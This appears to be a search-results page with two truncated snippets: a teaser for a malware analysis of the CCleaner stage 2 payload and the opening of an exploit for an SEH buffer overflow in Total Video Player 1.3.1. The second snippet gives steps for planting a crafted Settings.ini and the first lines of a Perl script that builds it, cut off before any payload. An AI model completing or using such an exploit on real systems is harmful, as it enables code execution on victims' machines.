2 matches found
Disassembler and Runtime Analysis
This post was authored by Paul Rascagneres.IntroductionIn the CCleaner 64bit stage 2 previously described in our blog, we explained that the attacker modified a legitimate executable that is part of "Symantec Endpoint". This file is named EFACli64.dll. The modification is performed in the runtime...
Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow Vulnerability
Usage Info To Exploit: - Replace Settings.ini file in program folder e.g., "C:\Program Files\Total Video Player" - Start Application !/usr/bin/perl my $buffsize = 5000; sets buffer size for consistent sized payload my $header = "Support Groups\r\nVideo="; start of ini file my $footer =...